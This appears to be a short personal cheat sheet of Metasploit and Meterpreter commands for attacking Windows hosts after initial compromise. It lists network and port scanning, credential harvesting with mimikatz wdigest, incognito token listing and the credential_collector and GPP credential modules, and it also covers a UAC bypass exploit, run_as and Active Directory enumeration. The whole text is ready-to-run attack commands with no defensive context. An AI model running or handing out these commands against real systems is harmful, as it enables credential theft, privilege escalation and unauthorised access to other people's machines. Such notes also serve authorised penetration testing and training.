Metasploit

Meterpreter

ARP Scan

run arp_scanner -r <IP>/24

Nmap

db_nmap -sS -A <IP>

PortScan

run auxiliary/scanner/portscan/tcp

Application Info

run post/windows/gather/enum_applications

Credential Gathering

run post/windows/gather/credentials/credential_collector

load mimikatz
wdigest

load incognito
list_tokens -u

Windows

# Collect a load of info
run winenum

# Show privs
run post/windows/gather/win_privs

# Run as
use exploit/windows/local/run_as

# Bypass UAC
use exploit/windows/local/bypassuac_injection

# Enumeration ADSI
load extapi
help extapi

adsi_computer_enum domainname

# GPP
use post/windows/gather/credentials/gpp